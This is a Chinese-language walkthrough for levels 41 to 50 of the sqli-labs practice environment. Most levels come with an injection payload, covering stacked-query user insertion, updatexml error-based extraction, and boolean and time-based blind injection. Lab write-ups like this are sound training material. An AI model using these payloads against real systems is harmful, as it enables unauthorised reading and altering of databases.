首页 > 数据库 >sqli-labs靶场通关攻略(41-60)

sqli-labs靶场通关攻略(41-60)

时间:2024-08-29 19:56:49浏览次数:12  
标签:sort labs database 41 60 报错 updatexml login concat

第四十一关

联合查询爆出数据库

但这关考察的时堆叠注入 ,我们给他注入一条数据

输入id=50即可查到我们注入的数据

 


第四十二关

看页面似曾相识,上次我们是用注册新用户然后对其他账户进行登录从而造成注入,但这次不能注册新用户了

存在堆叠注入函数,所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号,这样我们再来使用其进行登录就很简单了。 

login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login

 因为密码处有报错,所以我们使用报错注入爆出库名

login_user=1&login_password=1000'or updatexml(1,concat(1,database()),3)--+&mysubmit=Login


第四十三关

和第四十二关一样,只是闭合方式不同

login_user=1&login_password=1000')or updatexml(1,concat(1,database()),3)--+&mysubmit=Login


第四十四关

这关和四十二关一样,但是不能使用报错注入,不会显示报错信息

因为页面只有两种,我们尝试布尔盲注 ,正确页面没显示,确定数据库名为8位

用ascii码测试出库名,SCII码等于115,所以得出数据库第一位是s,继续测其它位就行

login_user=1&login_password=1000' or (ascii(substr(database() ,1,1)))=115--+&mysubmit=Login


第四十五关

和上一关一样,只是闭合方式不同,采用布尔盲注即可


第四十六关

这一关和其他关有所不同,根据页面提示我们的参数变成了sort,我们输入?sort=1,进入下图界面

输入?sort=1'会报错,就先尝试一下报错注入吧

 

成功爆出库名

?sort=1 and updatexml(1,concat(1,database()),3)--+ 

 

爆表名

?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3)--+

 


第四十七关

和上一关一样,只是闭合不同

?sort=1' and updatexml(1,concat(1,database()),3)--+

爆出库名


第四十八关

这关只有两个页面,所以考虑使用时间盲注

测出数据库有8位

?sort=1 and if(length(database())=8,sleep(1),1)--+

 

使用时间盲注语句得出数据库名第一位ascii码为115,同方法依次查出库名

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)--+ 

 


第四十九关

和第四十八关一样,只不过是闭合不同

?sort=1' and if(length(database())=8,sleep(1),1)--+

 


第五十关

先加个'看看,报错了我们尝试使用报错函数

直接爆出库名

 ?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

 

 

 

 

标签:sort,labs,database,41,60,报错,updatexml,login,concat
From: https://blog.csdn.net/kknifek/article/details/141645482

相关文章

  • AGC041D Problem Scores 题解
    在分值不降的条件下,要使任意一个大小为\(k\)的子集\(S\)内题目的分值之和少于任意一个大小为\(k+1\)的子集\(T\)内题目的分值之和,容易发现只需要取\(S\)为后\(k\)道题目,\(T\)为前\(k+1\)道题目时满足限制即可。换而言之,只需要对满足\(a\)的每一段长为\(k+......
  • FANUC A06B-6220-H030#H600 驱动器的优缺点
    优点:高性能:采用先进的数字信号处理器(DSP)作为控制核心,能够实现复杂的控制算法,提供高精度和高响应速度的运动控制。高可靠性:内置多种故障检测和保护电路,如过电压、过电流、过热、欠压等,确保在异常情况下能够自动保护,避免设备损坏。软启动功能减小了启动过程对驱动器的冲击,延长......
  • sqli-labs靶场通关攻略(41-50)
    Less-41 步骤一:查看数据库名?id=-1unionselect1,2,database()--+步骤二:查看表名?id=-1unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()--+步骤三:查看users表中列名?id=-1unionselect1,group_concat(......
  • Data Visualisation for Managers (INFS6023)
    Data Visualisation for Managers(INFS6023)AssignmentCaseHydro EU:Visualizing Renewable Energy ProductionAcross EuropeBackgroundHydro EU, headquartered in Milan, Italy,stands as Europe’s leading producer of clean and renewableene......
  • 智谱开源 CogVideoX-5B 视频生成模型,RTX 3060 显卡可运行;曝 OpenAI 模型「草莓」今秋
       开发者朋友们大家好: 这里是「RTE开发者日报」,每天和大家一起看新闻、聊八卦。我们的社区编辑团队会整理分享RTE(Real-TimeEngagement)领域内「有话题的新闻」、「有态度的观点」、「有意思的数据」、「有思考的文章」、「有看点的会议」,但内容仅代表编......
  • phpinclude-labs做题记录
    Level1file协议payload:?wrappers=/flagLevel2data协议去包含data协议中的内容其实相当于进行了一次远程包含,所以data协议的利用条件需要php.ini中开启allow_url_fopen和allow_url_includeGET:?wrappers=,然后POST:helloctf=system('cat/flag');Level3data......
  • 洛谷P4163[SCOI2007]排列
    洛谷P4163[SCOI2007]排列题意给一个数字串\(s\)和正整数\(d\),统计\(s\)有多少种不同的排列能被\(d\)整除(可以有前导\(0\))。思路考虑状压dp。\(dp_{S,k}\)表示当前已经选定了\(S\)集合(下标)的数,模\(d=k\)的方案数。状态转移方程:\[dp_{S|2^j,(k\times10+s_j)......
  • LOJ #160. 树形背包 题解
    Description有\(N\)个物品,编号分别为\(1\ldotsN\)。物品\(i\)的重量为\(w_i\),价值为\(v_i\)。给出每个物品依赖于哪个物品。我们用\(d_i=j\(i>j>0)\)表示:如果要选取物品\(i\),就必须先选取物品\(j\)。另外,我们用\(d_i=0(i>0)\)表示:该物品不依赖于任何物品。......
  • sql-labs36-40通关攻略
    第36关一.判断闭合点http://127.0.0.1/Less-36/?id=1%df%20--+http://127.0.0.1/Less-36/?id=1%df%20--+二.查询数据库http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(......
  • MySQL 2003 - Can’t connect to MySQL server on ' '(10060)
    2003-Can’tconnecttoMySQLserveron''(10060) 一般是以下几个原因造成的:1.网络不通畅2.mysql服务未启动3.防火墙未开放端口4##云服务器的安全组规则未设置  一般是以下几个原因造成的:1.网络不通畅:【mysql-u-p,看看能不能登陆】2.mysql服务未启动:......